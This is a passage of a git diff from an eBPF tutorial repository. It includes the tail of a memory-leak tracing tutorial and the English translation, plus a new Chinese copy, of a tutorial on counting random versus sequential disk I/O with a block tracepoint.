This is also a BPF program that will be executed when the `kmem_cache_alloc` function is called in the kernel. If the `wa_missing_free` flag is set, it calls the `gen_free_enter` function to handle possible missed release operations. Then, the function calls the `gen_alloc_enter` function to handle memory allocation and finally calls the `gen_alloc_exit2` function to record the allocation result. - -Both of these BPF programs use the `SEC` macro to define the corresponding tracepoints, so that they can be executed when the corresponding kernel functions are called. In the Linux kernel, a tracepoint is a static hook that can be inserted into the kernel to collect runtime kernel information. It is very useful for debugging and performance analysis. - -In the process of understanding this code, pay attention to the use of the `BPF_CORE_READ` macro. This macro is used to read kernel data in BPF programs. In BPF programs, we cannot directly access kernel memory and need to use such macros to safely read data. - -### User-Space Program - -After understanding the BPF kernel part, let's switch to the user-space program. The user-space program works closely with the BPF kernel program. It is responsible for loading BPF programs into the kernel, setting up and managing BPF maps, and handling data collected from BPF programs. The user-space program is longer, but here we can briefly refer to its mount point. - -```c -int attach_uprobes(struct memleak_bpf *skel) -{ - ATTACH_UPROBE_CHECKED(skel, malloc, malloc_enter); - ATTACH_URETPROBE_CHECKED(skel, malloc, malloc_exit); - ATTACH_UPROBE_CHECKED(skel, calloc, calloc_enter); - ATTACH_URETPROBE_CHECKED(skel, calloc, calloc_exit); - - ATTACH_UPROBE_CHECKED(skel, realloc, realloc_enter); - ATTACH_URETPROBE_CHECKED(skel, realloc, realloc_exit); - - ATTACH_UPROBE_CHECKED(skel, mmap, mmap_enter); - ATTACH_URETPROBE_CHECKED(skel, mmap, mmap_exit); - - ATTACH_UPROBE_CHECKED(skel, posix_memalign, posix_memalign_enter); - ATTACH_URETPROBE_CHECKED(skel, posix_memalign, posix_memalign_exit); - - ATTACH_UPROBE_CHECKED(skel, memalign, memalign_enter); - ATTACH_URETPROBE_CHECKED(skel, memalign, memalign_exit); - - ATTACH_UPROBE_CHECKED(skel, free, free_enter); - ATTACH_UPROBE_CHECKED(skel, munmap, munmap_enter); - - // the following probes are intentionally allowed to fail attachment - - // deprecated in libc.so bionic - ATTACH_UPROBE(skel, valloc, valloc_enter); - ATTACH_URETPROBE(skel, valloc, valloc_exit); - - // deprecated in libc.so bionic - ATTACH_UPROBE(skel, pvalloc, pvalloc_enter); - ATTACH_URETPROBE(skel, pvalloc, pvalloc_exit); - - // added in C11 - ATTACH_UPROBE(skel, aligned_alloc, aligned_alloc_enter); - ATTACH_URETPROBE(skel, aligned_alloc, aligned_alloc_exit); - - return 0; -} -``` - -In this code snippet, we see a function called `attach_uprobes` that mounts uprobes (user space probes) onto memory allocation and deallocation functions. In Linux, uprobes are a kernel mechanism that allows setting breakpoints at arbitrary locations in user space programs, enabling precise observation and control over the behavior of user space programs. - -Here, each memory-related function is traced using two uprobes: one at the entry (enter) of the function and one at the exit. Thus, every time these functions are called or return, a uprobes event is triggered, which in turn triggers the corresponding BPF program. - -In the actual implementation, we use two macros, `ATTACH_UPROBE` and `ATTACH_URETPROBE`, to attach uprobes and uretprobes (function return probes), respectively. Each macro takes three arguments: the skeleton of the BPF program (skel), the name of the function to monitor, and the name of the BPF program to trigger. - -These mount points include common memory allocation functions such as malloc, calloc, realloc, mmap, posix_memalign, memalign, free, and their corresponding exit points. Additionally, we also observe some possible allocation functions such as valloc, pvalloc, aligned_alloc, although they may not always exist. - -The goal of these mount points is to capture all possible memory allocation and deallocation events, allowing our memory leak detection tool to obtain as comprehensive data as possible. This approach enables us to track not only memory allocation and deallocation but also their contextual information such as call stacks and invocation counts, helping us to pinpoint and fix memory leak issues. - -Note that some memory allocation functions may not exist or may have been deprecated, such as valloc and pvalloc. Thus, their attachment may fail. In such cases, we allow for attachment failures, which do not prevent the program from executing. This is because we are more focused on mainstream and commonly used memory allocation functions, while these deprecated functions are often used less frequently in practical applications. - -Complete source code: - -Reference: - -## Compile and Run - -```console -$ make -$ sudo ./memleak -using default object: libc.so.6 -using page size: 4096 -tracing kernel: true -Tracing outstanding memory allocs... Hit Ctrl-C to end -[17:17:27] Top 10 stacks with outstanding allocations: -1236992 bytes in 302 allocations from stack - 0 [] - 1 [] - 2 [] - 3 [] - 4 [] - 5 [] - 6 [] -... -``` - -## Summary - -Through this eBPF introductory tutorial, you have learned how to write a Memleak eBPF monitoring program to monitor memory leaks in real time. You have also learned about the application of eBPF in memory monitoring, how to write eBPF programs using the BPF API, create and use eBPF maps, and how to use eBPF tools to monitor and analyze memory leak issues. We have provided a detailed example to help you understand the execution flow and principles of eBPF code. - -You can visit our tutorial code repository at or website for more examples and complete tutorials. - -> The original link of this article: diff --git a/src/17-biopattern/README.md b/src/17-biopattern/README.md index e07e976..2a7cb9c 100644 --- a/src/17-biopattern/README.md +++ b/src/17-biopattern/README.md @@ -1,41 +1,41 @@ -# eBPF 入门实践教程十七:编写 eBPF 程序统计随机/顺序磁盘 I/O +# eBPF Tutorial by Example 17: Count Random/Sequential Disk I/O -eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一种新技术,允许用户在内核空间中执行自定义程序,而无需更改内核代码。这为系统管理员和开发者提供了强大的工具,可以深入了解和监控系统的行为,从而进行优化。 +eBPF (Extended Berkeley Packet Filter) is a new technology in the Linux kernel that allows users to execute custom programmes in kernel space without changing the kernel code. This provides system administrators and developers with powerful tools to gain insight into and monitor system behaviour for optimisation. -在本篇教程中,我们将探索如何使用 eBPF 编写程序来统计随机和顺序的磁盘 I/O。磁盘 I/O 是计算机性能的关键指标之一,特别是在数据密集型应用中。 +In this tutorial, we will explore how to use eBPF to write programs to count random and sequential disk I/O. Disk I/O is one of the key metrics of computer performance, especially in data-intensive applications. -## 随机/顺序磁盘 I/O +## Random/Sequential Disk I/O -随着技术的进步和数据量的爆炸性增长,磁盘 I/O 成为了系统性能的关键瓶颈。应用程序的性能很大程度上取决于其如何与存储层进行交互。因此,深入了解和优化磁盘 I/O,特别是随机和顺序的 I/O,变得尤为重要。 +As technology advances and data volumes explode, disk I/O becomes a critical bottleneck in system performance. The performance of an application depends heavily on how it interacts with the storage tier. Therefore, it becomes especially important to deeply understand and optimise disk I/O, especially random and sequential I/O. -1. **随机 I/O**:随机 I/O 发生在应用程序从磁盘的非连续位置读取或写入数据时。这种 I/O 模式的主要特点是磁盘头需要频繁地在不同的位置之间移动,导致其通常比顺序 I/O 的速度慢。典型的产生随机 I/O 的场景包括数据库查询、文件系统的元数据操作以及虚拟化环境中的并发任务。 +1. **Random I/O**: Random I/O occurs when an application reads or writes data from or to a non-sequential location on the disk. The main characteristic of this I/O mode is that the disk head needs to move frequently between locations, causing it to be typically slower than sequential I/O. Typical scenarios that generate random I/O include database queries, file system metadata operations, and concurrent tasks in virtualised environments. -2. **顺序 I/O**:与随机 I/O 相反,顺序 I/O 是当应用程序连续地读取或写入磁盘上的数据块。这种 I/O 模式的优势在于磁盘头可以在一个方向上连续移动,从而大大提高了数据的读写速度。视频播放、大型文件的下载或上传以及连续的日志记录都是产生顺序 I/O 的典型应用。 +2. **Sequential I/O**: In contrast to random I/O, sequential I/O occurs when an application continuously reads or writes blocks of data to or from disk. The advantage of this I/O mode is that the disk head can move continuously in one direction, which greatly increases the speed at which data can be read and written. Video playback, downloading or uploading large files, and continuous logging are typical applications that generate sequential I/O. -为了实现存储性能的最优化,了解随机和顺序的磁盘 I/O 是至关重要的。例如,随机 I/O 敏感的应用程序在 SSD 上的性能通常远超于传统硬盘,因为 SSD 在处理随机 I/O 时几乎没有寻址延迟。相反,对于大量顺序 I/O 的应用,如何最大化磁盘的连续读写速度则更为关键。 +To optimise storage performance, it is critical to understand both random and sequential disk I/O. For example, random I/O-sensitive applications typically perform far better on SSDs than on traditional hard drives because SSDs have virtually no addressing latency when dealing with random I/Os. Conversely, for applications with a lot of sequential I/O, it is much more critical to maximize the sequential read and write speed of the disk. -在本教程的后续部分,我们将详细探讨如何使用 eBPF 工具来实时监控和统计这两种类型的磁盘 I/O。这不仅可以帮助我们更好地理解系统的 I/O 行为,还可以为进一步的性能优化提供有力的数据支持。 +In the rest of this tutorial, we will discuss in detail how to use the eBPF tool to monitor and count both types of disk I/O in real time, which will not only help us better understand the I/O behaviour of the system, but will also provide us with strong data for further performance optimization. ## Biopattern -Biopattern 可以统计随机/顺序磁盘I/O次数的比例。 +Biopattern counts the percentage of random/sequential disk I/Os. -首先,确保你已经正确安装了 libbpf 和相关的工具集,可以在这里找到对应的源代码:[bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 关于如何安装依赖,请参考: +First of all, make sure that you have installed libbpf and the associated toolset correctly, you can find the source code here: [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) -导航到 `biopattern` 的源代码目录,并使用 `make` 命令进行编译: +Navigate to the `biopattern` source directory and compile it using the `make` command: ```bash cd ~/bpf-developer-tutorial/src/17-biopattern make ``` -编译成功后,你应该可以在当前目录下看到 `biopattern` 的可执行文件。基本的运行命令如下: +After successful compilation, you should see the `biopattern` executable in the current directory. The basic runtime commands are as follows: ```bash sudo ./biopattern [interval] [count] ``` -例如,要每秒打印一次输出,并持续10秒,你可以运行: +For example, to print the output once per second for 10 seconds, you can run: ```console $ sudo ./biopattern 1 10 @@ -48,24 +48,24 @@ sda 100 0 26 136 sda 0 100 1 4 ``` -输出列的含义如下: +The output columns have the following meanings: -- `DISK`:被追踪的磁盘名称。 -- `%RND`:随机 I/O 的百分比。 -- `%SEQ`:顺序 I/O 的百分比。 -- `COUNT`:在指定的时间间隔内的 I/O 请求次数。 -- `KBYTES`:在指定的时间间隔内读写的数据量(以 KB 为单位)。 +- `DISK`: Name of the disk being tracked. +- `%RND`: Percentage of random I/O. +- `%SEQ`: percentage of sequential I/O. +- `COUNT`: Number of I/O requests in the specified interval. +- `KBYTES`: amount of data (in KB) read and written in the specified time interval. -从上述输出中,我们可以得出以下结论: +From the above output, we can draw the following conclusions: -- `sr0` 和 `sr1` 设备在观测期间主要进行了顺序 I/O,但数据量很小。 -- `sda` 设备在某些时间段内只进行了随机 I/O,而在其他时间段内只进行了顺序 I/O。 +- The `sr0` and `sr1` devices performed mostly sequential I/O during the observation period, but the amount of data was small. +- The `sda` device performed only random I/O during some time periods and only sequential I/O during other time periods. -这些信息可以帮助我们了解系统的 I/O 模式,从而进行针对性的优化。 +This information can help us understand the I/O pattern of the system so that we can target optimisation. -## eBPF Biopattern 实现原理 +## eBPF Biopattern Implementation Principles -首先,让我们看一下 biopattern 的核心 eBPF 内核态代码: +First, let's look at the eBPF kernel state code at the heart of biopattern: ```c #include @@ -125,29 +125,27 @@ int handle__block_rq_complete(void *args) char LICENSE[] SEC("license") = "GPL"; ``` -1. 全局变量定义 +Global variable definitions: ```c - const volatile bool filter_dev = false; - const volatile __u32 targ_dev = 0; + const volatile bool filter_dev = false; + const volatile __u32 targ_dev = 0; ``` -这两个全局变量用于设备过滤。`filter_dev` 决定是否启用设备过滤,而 `targ_dev` 是我们想要追踪的目标设备的标识符。 +These two global variables are used for device filtering. `filter_dev` determines whether device filtering is enabled or not, and `targ_dev` is the identifier of the target device we want to track. -BPF map 定义: +BPF map definition: ```c - struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 64); - __type(key, u32); - __type(value, struct counter); - } counters SEC(".maps"); + struct { __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 64); __type(key, u32); + __type(value, struct counter); + } counters SEC(".maps"). ``` -这部分代码定义了一个 BPF map,类型为哈希表。该映射的键是设备的标识符,而值是一个 `counter` 结构体,用于存储设备的 I/O 统计信息。 +This part of the code defines a BPF map of type hash table. The key of the map is the identifier of the device, and the value is a `counter` struct, which is used to store the I/O statistics of the device. -追踪点函数: +The tracepoint function: ```c SEC("tracepoint/block/block_rq_complete") @@ -188,23 +186,26 @@ BPF map 定义: } ``` -在 Linux 中,每次块设备的 I/O 请求完成时,都会触发一个名为 `block_rq_complete` 的追踪点。这为我们提供了一个机会,通过 eBPF 来捕获这些事件,并进一步分析 I/O 的模式。 +In Linux, a trace point called `block_rq_complete` is triggered every time an I/O request for a block device completes. This provides an opportunity to capture these events with eBPF and further analyse the I/O patterns. -主要逻辑分析: +Main Logic Analysis: -- **提取 I/O 请求信息**:从传入的参数中获取 I/O 请求的相关信息。这里有两种可能的上下文结构,取决于 `has_block_rq_completion` 的返回值。这是因为不同版本的 Linux 内核可能会有不同的追踪点定义。无论哪种情况,我们都从上下文中提取出扇区号 (`sector`)、扇区数量 (`nr_sector`) 和设备标识符 (`dev`)。 -- **设备过滤**:如果启用了设备过滤 (`filter_dev` 为 `true`),并且当前设备不是目标设备 (`targ_dev`),则直接返回。这允许用户只追踪特定的设备,而不是所有设备。 -- **统计信息更新**: - - **查找或初始化统计信息**:使用 `bpf_map_lookup_or_try_init` 函数查找或初始化与当前设备相关的统计信息。如果映射中没有当前设备的统计信息,它会使用 `zero` 结构体进行初始化。 - - **判断 I/O 模式**:根据当前 I/O 请求与上一个 I/O 请求的扇区号,我们可以判断当前请求是随机的还是顺序的。如果两次请求的扇区号相同,那么它是顺序的;否则,它是随机的。然后,我们使用 `__sync_fetch_and_add` 函数更新相应的统计信息。这是一个原子操作,确保在并发环境中数据的一致性。 - - **更新数据量**:我们还更新了该设备的总数据量,这是通过将扇区数量 (`nr_sector`) 乘以 512(每个扇区的字节数)来实现的。 - - **更新最后一个 I/O 请求的扇区号**:为了下一次的比较,我们更新了 `last_sector` 的值。 +- **Extracting I/O request information**: get information about the I/O request from the incoming parameters. There are two possible context structures depending on the return value of `has_block_rq_completion`. This is because different versions of the Linux kernel may have different tracepoint definitions. In either case, we extract the sector number `(sector)`, the number of sectors `(nr_sector)` and the device identifier `(dev)` from the context. -在 Linux 内核的某些版本中,由于引入了一个新的追踪点 `block_rq_error`,追踪点的命名和结构发生了变化。这意味着,原先的 `block_rq_complete` 追踪点的结构名称从 `trace_event_raw_block_rq_complete` 更改为 `trace_event_raw_block_rq_completion`。这种变化可能会导致 eBPF 程序在不同版本的内核上出现兼容性问题。 +- **Device filtering**: If device filtering is enabled `(filter_dev` is `true` ) and the current device is not the target device `(targ_dev` ), it is returned directly. This allows the user to track only specific devices, not all devices. -为了解决这个问题,`biopattern` 工具引入了一种机制来动态检测当前内核使用的是哪种追踪点结构,即 `has_block_rq_completion` 函数。 +- **Statistics update**: -1. **定义两种追踪点结构**: + - **Lookup or initialise statistics**: use the `bpf_map_lookup_or_try_init` function to lookup or initialise statistics related to the current device. If there is no statistics for the current device in the map, it will be initialised using the `zero` structure. +- **Determine the I/O mode**: Based on the sector number of the current I/O request and the previous I/O request, we can determine whether the current request is random or sequential. If the sector numbers of the two requests are the same, then it is sequential; otherwise, it is random. We then use the `__sync_fetch_and_add` function to update the corresponding statistics. This is an atomic operation that ensures data consistency in a concurrent environment. +- **Update the amount of data**: we also update the total amount of data for the device, which is done by multiplying the number of sectors `(nr_sector` ) by 512 (the number of bytes per sector). +- **Update the sector number of the last I/O request**: for the next comparison, we update the value of `last_sector`. + +In some versions of the Linux kernel, the naming and structure of the tracepoint has changed due to the introduction of a new tracepoint, `block_rq_error`. This means that the structural name of the former `block_rq_complete` tracepoint has been changed from `trace_event_raw_block_rq_complete` to `trace_event_raw_block_rq_completion`, a change which may cause compatibility issues with eBPF programs on different versions of the kernel. This change may cause compatibility issues with eBPF programs on different versions of the kernel. + +To address this issue, the `biopattern` utility introduces a mechanism to dynamically detect which trace point structure is currently used by the kernel, namely the `has_block_rq_completion` function. + +1. **Define two trace point structures**: ```c struct trace_event_raw_block_rq_complete___x { @@ -220,9 +221,9 @@ BPF map 定义: } __attribute__((preserve_access_index)); ``` -这里定义了两种追踪点结构,分别对应于不同版本的内核。每种结构都包含设备标识符 (`dev`)、扇区号 (`sector`) 和扇区数量 (`nr_sector`)。 +Two tracepoint structures are defined here, corresponding to different versions of the kernel. Each structure contains a device identifier `(dev` ), sector number `(sector` ), and number of sectors `(nr_sector` ). -**动态检测追踪点结构**: +**Dynamic detection of trackpoint structures**: ```c static __always_inline bool has_block_rq_completion() @@ -233,13 +234,13 @@ BPF map 定义: } ``` -`has_block_rq_completion` 函数使用 `bpf_core_type_exists` 函数来检测当前内核是否存在 `trace_event_raw_block_rq_completion___x` 结构。如果存在,函数返回 `true`,表示当前内核使用的是新的追踪点结构;否则,返回 `false`,表示使用的是旧的结构。在对应的 eBPF 代码中,会根据两种不同的定义分别进行处理,这也是适配不同内核版本之间的变更常见的方案。 +The `has_block_rq_completion` function uses the `bpf_core_type_exists` function to detect the presence of the structure `trace_event_raw_block_rq_completion___x` in the current kernel. If it exists, the function returns `true`, indicating that the current kernel is using the new tracepoint structure; otherwise, it returns `false`, indicating that it is using the old structure. The two different definitions are handled separately in the corresponding eBPF code, which is a common solution for adapting to changes between kernel versions. -### 用户态代码 +### User State Code -`biopattern` 工具的用户态代码负责从 BPF 映射中读取统计数据,并将其展示给用户。通过这种方式,系统管理员可以实时监控每个设备的 I/O 模式,从而更好地理解和优化系统的 I/O 性能。 +The `biopattern` tool's userland code is responsible for reading statistics from the BPF mapping and presenting them to the user. In this way, system administrators can monitor the I/O patterns of each device in real time to better understand and optimise the I/O performance of the system. -主循环: +1. Main loop ```c /* main: poll */ @@ -255,13 +256,13 @@ BPF map 定义: } ``` -这是 `biopattern` 工具的主循环,它的工作流程如下: +This is the main loop of the `biopattern` utility, and its workflow is as follows: -- **等待**:使用 `sleep` 函数等待指定的时间间隔 (`env.interval`)。 -- **打印映射**:调用 `print_map` 函数打印 BPF 映射中的统计数据。 -- **退出条件**:如果收到退出信号 (`exiting` 为 `true`) 或者达到指定的运行次数 (`env.times` 达到 0),则退出循环。 +- **Wait**: use the `sleep` function to wait for the specified interval `(env.interval` ). +- `print_map`: call `print_map` function to print the statistics in BPF map. +- **Exit condition**: if an exit signal is received `(exiting` is `true` ) or if the specified number of runs is reached `(env.times` reaches 0), the loop exits. -打印映射函数: +Print mapping function: ```c static int print_map(struct bpf_map *counters, struct partitions *partitions) @@ -312,18 +313,20 @@ BPF map 定义: } ``` -`print_map` 函数负责从 BPF 映射中读取统计数据,并将其打印到控制台。其主要逻辑如下: +The `print_map` function is responsible for reading statistics from the BPF map and printing them to the console. The main logic is as follows: -- **遍历 BPF 映射**:使用 `bpf_map_get_next_key` 和 `bpf_map_lookup_elem` 函数遍历 BPF 映射,获取每个设备的统计数据。 -- **计算总数**:计算每个设备的随机和顺序 I/O 的总数。 -- **打印统计数据**:如果启用了时间戳 (`env.timestamp` 为 `true`),则首先打印当前时间。接着,打印设备名称、随机 I/O 的百分比、顺序 I/O 的百分比、总 I/O 数量和总数据量(以 KB 为单位)。 -- **清理 BPF 映射**:为了下一次的统计,使用 `bpf_map_get_next_key` 和 `bpf_map_delete_elem` 函数清理 BPF 映射中的所有条目。 +- **Traverse the BPF map**: Use the `bpf_map_get_next_key` and `bpf_map_lookup_elem` functions to traverse the BPF map and get the statistics for each device. +- **Calculate totals**: Calculate the total number of random and sequential I/Os for each device. +- **Print statistics**: If timestamp is enabled `(env.timestamp` is `true` ), the current time is printed first. Next, the device name, percentage of random I/O, percentage of sequential I/O, total I/O, and total data in KB are printed. +- **Cleaning up the BPF map**: For the next count, use the `bpf_map_get_next_key` and `bpf_map_delete_elem` functions to clean up all entries in the BPF map. -## 总结 +## Summary -在本教程中,我们深入探讨了如何使用 eBPF 工具 biopattern 来实时监控和统计随机和顺序的磁盘 I/O。我们首先了解了随机和顺序磁盘 I/O 的重要性,以及它们对系统性能的影响。接着,我们详细介绍了 biopattern 的工作原理,包括如何定义和使用 BPF maps,如何处理不同版本的 Linux 内核中的追踪点变化,以及如何在 eBPF 程序中捕获和分析磁盘 I/O 事件。 +In this tutorial, we have taken an in-depth look at how to use the eBPF tool biopattern to monitor and count random and sequential disk I/O in real-time. we started by understanding the importance of random and sequential disk I/O and their impact on system performance. We then describe in detail how biopattern works, including how to define and use BPF maps, how to deal with tracepoint variations in different versions of the Linux kernel, and how to capture and analyse disk I/O events in an eBPF program. -您可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +You can visit our tutorial code repository [at https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [at https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and a complete tutorial. -- 完整代码: -- bcc 工具: +- Source repo: +- bcc tool: + +> The original link of this article: diff --git a/src/17-biopattern/README.zh.md b/src/17-biopattern/README.zh.md new file mode 100644 index 0000000..e07e976 --- /dev/null +++ b/src/17-biopattern/README.zh.md @@ -0,0 +1,329 @@ +# eBPF 入门实践教程十七:编写 eBPF 程序统计随机/顺序磁盘 I/O + +eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一种新技术,允许用户在内核空间中执行自定义程序,而无需更改内核代码。这为系统管理员和开发者提供了强大的工具,可以深入了解和监控系统的行为,从而进行优化。 + +在本篇教程中,我们将探索如何使用 eBPF 编写程序来统计随机和顺序的磁盘 I/O。磁盘 I/O 是计算机性能的关键指标之一,特别是在数据密集型应用中。 + +## 随机/顺序磁盘 I/O + +随着技术的进步和数据量的爆炸性增长,磁盘 I/O 成为了系统性能的关键瓶颈。应用程序的性能很大程度上取决于其如何与存储层进行交互。因此,深入了解和优化磁盘 I/O,特别是随机和顺序的 I/O,变得尤为重要。 + +1. **随机 I/O**:随机 I/O 发生在应用程序从磁盘的非连续位置读取或写入数据时。这种 I/O 模式的主要特点是磁盘头需要频繁地在不同的位置之间移动,导致其通常比顺序 I/O 的速度慢。典型的产生随机 I/O 的场景包括数据库查询、文件系统的元数据操作以及虚拟化环境中的并发任务。 + +2. **顺序 I/O**:与随机 I/O 相反,顺序 I/O 是当应用程序连续地读取或写入磁盘上的数据块。这种 I/O 模式的优势在于磁盘头可以在一个方向上连续移动,从而大大提高了数据的读写速度。视频播放、大型文件的下载或上传以及连续的日志记录都是产生顺序 I/O 的典型应用。 + +为了实现存储性能的最优化,了解随机和顺序的磁盘 I/O 是至关重要的。例如,随机 I/O 敏感的应用程序在 SSD 上的性能通常远超于传统硬盘,因为 SSD 在处理随机 I/O 时几乎没有寻址延迟。相反,对于大量顺序 I/O 的应用,如何最大化磁盘的连续读写速度则更为关键。 + +在本教程的后续部分,我们将详细探讨如何使用 eBPF 工具来实时监控和统计这两种类型的磁盘 I/O。这不仅可以帮助我们更好地理解系统的 I/O 行为,还可以为进一步的性能优化提供有力的数据支持。 + +## Biopattern + +Biopattern 可以统计随机/顺序磁盘I/O次数的比例。 + +首先,确保你已经正确安装了 libbpf 和相关的工具集,可以在这里找到对应的源代码:[bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 关于如何安装依赖,请参考: + +导航到 `biopattern` 的源代码目录,并使用 `make` 命令进行编译: + +```bash +cd ~/bpf-developer-tutorial/src/17-biopattern +make +``` + +编译成功后,你应该可以在当前目录下看到 `biopattern` 的可执行文件。基本的运行命令如下: + +```bash +sudo ./biopattern [interval] [count] +``` + +例如,要每秒打印一次输出,并持续10秒,你可以运行: + +```console +$ sudo ./biopattern 1 10 +Tracing block device I/O requested seeks... Hit Ctrl-C to end. +DISK %RND %SEQ COUNT KBYTES +sr0 0 100 3 0 +sr1 0 100 8 0 +sda 0 100 1 4 +sda 100 0 26 136 +sda 0 100 1 4 +``` + +输出列的含义如下: + +- `DISK`:被追踪的磁盘名称。 +- `%RND`:随机 I/O 的百分比。 +- `%SEQ`:顺序 I/O 的百分比。 +- `COUNT`:在指定的时间间隔内的 I/O 请求次数。 +- `KBYTES`:在指定的时间间隔内读写的数据量(以 KB 为单位)。 + +从上述输出中,我们可以得出以下结论: + +- `sr0` 和 `sr1` 设备在观测期间主要进行了顺序 I/O,但数据量很小。 +- `sda` 设备在某些时间段内只进行了随机 I/O,而在其他时间段内只进行了顺序 I/O。 + +这些信息可以帮助我们了解系统的 I/O 模式,从而进行针对性的优化。 + +## eBPF Biopattern 实现原理 + +首先,让我们看一下 biopattern 的核心 eBPF 内核态代码: + +```c +#include +#include +#include +#include "biopattern.h" +#include "maps.bpf.h" +#include "core_fixes.bpf.h" + +const volatile bool filter_dev = false; +const volatile __u32 targ_dev = 0; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 64); + __type(key, u32); + __type(value, struct counter); +} counters SEC(".maps"); + +SEC("tracepoint/block/block_rq_complete") +int handle__block_rq_complete(void *args) +{ + struct counter *counterp, zero = {}; + sector_t sector; + u32 nr_sector; + u32 dev; + + if (has_block_rq_completion()) { + struct trace_event_raw_block_rq_completion___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } else { + struct trace_event_raw_block_rq_complete___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } + + if (filter_dev && targ_dev != dev) + return 0; + + counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero); + if (!counterp) + return 0; + if (counterp->last_sector) { + if (counterp->last_sector == sector) + __sync_fetch_and_add(&counterp->sequential, 1); + else + __sync_fetch_and_add(&counterp->random, 1); + __sync_fetch_and_add(&counterp->bytes, nr_sector * 512); + } + counterp->last_sector = sector + nr_sector; + return 0; +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +1. 全局变量定义 + +```c + const volatile bool filter_dev = false; + const volatile __u32 targ_dev = 0; +``` + +这两个全局变量用于设备过滤。`filter_dev` 决定是否启用设备过滤,而 `targ_dev` 是我们想要追踪的目标设备的标识符。 + +BPF map 定义: + +```c + struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 64); + __type(key, u32); + __type(value, struct counter); + } counters SEC(".maps"); +``` + +这部分代码定义了一个 BPF map,类型为哈希表。该映射的键是设备的标识符,而值是一个 `counter` 结构体,用于存储设备的 I/O 统计信息。 + +追踪点函数: + +```c + SEC("tracepoint/block/block_rq_complete") + int handle__block_rq_complete(void *args) + { + struct counter *counterp, zero = {}; + sector_t sector; + u32 nr_sector; + u32 dev; + + if (has_block_rq_completion()) { + struct trace_event_raw_block_rq_completion___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } else { + struct trace_event_raw_block_rq_complete___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } + + if (filter_dev && targ_dev != dev) + return 0; + + counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero); + if (!counterp) + return 0; + if (counterp->last_sector) { + if (counterp->last_sector == sector) + __sync_fetch_and_add(&counterp->sequential, 1); + else + __sync_fetch_and_add(&counterp->random, 1); + __sync_fetch_and_add(&counterp->bytes, nr_sector * 512); + } + counterp->last_sector = sector + nr_sector; + return 0; + } +``` + +在 Linux 中,每次块设备的 I/O 请求完成时,都会触发一个名为 `block_rq_complete` 的追踪点。这为我们提供了一个机会,通过 eBPF 来捕获这些事件,并进一步分析 I/O 的模式。 + +主要逻辑分析: + +- **提取 I/O 请求信息**:从传入的参数中获取 I/O 请求的相关信息。这里有两种可能的上下文结构,取决于 `has_block_rq_completion` 的返回值。这是因为不同版本的 Linux 内核可能会有不同的追踪点定义。无论哪种情况,我们都从上下文中提取出扇区号 (`sector`)、扇区数量 (`nr_sector`) 和设备标识符 (`dev`)。 +- **设备过滤**:如果启用了设备过滤 (`filter_dev` 为 `true`),并且当前设备不是目标设备 (`targ_dev`),则直接返回。这允许用户只追踪特定的设备,而不是所有设备。 +- **统计信息更新**: + - **查找或初始化统计信息**:使用 `bpf_map_lookup_or_try_init` 函数查找或初始化与当前设备相关的统计信息。如果映射中没有当前设备的统计信息,它会使用 `zero` 结构体进行初始化。 + - **判断 I/O 模式**:根据当前 I/O 请求与上一个 I/O 请求的扇区号,我们可以判断当前请求是随机的还是顺序的。如果两次请求的扇区号相同,那么它是顺序的;否则,它是随机的。然后,我们使用 `__sync_fetch_and_add` 函数更新相应的统计信息。这是一个原子操作,确保在并发环境中数据的一致性。 + - **更新数据量**:我们还更新了该设备的总数据量,这是通过将扇区数量 (`nr_sector`) 乘以 512(每个扇区的字节数)来实现的。 + - **更新最后一个 I/O 请求的扇区号**:为了下一次的比较,我们更新了 `last_sector` 的值。 + +在 Linux 内核的某些版本中,由于引入了一个新的追踪点 `block_rq_error`,追踪点的命名和结构发生了变化。这意味着,原先的 `block_rq_complete` 追踪点的结构名称从 `trace_event_raw_block_rq_complete` 更改为 `trace_event_raw_block_rq_completion`。这种变化可能会导致 eBPF 程序在不同版本的内核上出现兼容性问题。 + +为了解决这个问题,`biopattern` 工具引入了一种机制来动态检测当前内核使用的是哪种追踪点结构,即 `has_block_rq_completion` 函数。 + +1. **定义两种追踪点结构**: + +```c + struct trace_event_raw_block_rq_complete___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; + } __attribute__((preserve_access_index)); + + struct trace_event_raw_block_rq_completion___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; + } __attribute__((preserve_access_index)); +``` + +这里定义了两种追踪点结构,分别对应于不同版本的内核。每种结构都包含设备标识符 (`dev`)、扇区号 (`sector`) 和扇区数量 (`nr_sector`)。 + +**动态检测追踪点结构**: + +```c + static __always_inline bool has_block_rq_completion() + { + if (bpf_core_type_exists(struct trace_event_raw_block_rq_completion___x)) + return true; + return false; + } +``` + +`has_block_rq_completion` 函数使用 `bpf_core_type_exists` 函数来检测当前内核是否存在 `trace_event_raw_block_rq_completion___x` 结构。如果存在,函数返回 `true`,表示当前内核使用的是新的追踪点结构;否则,返回 `false`,表示使用的是旧的结构。在对应的 eBPF 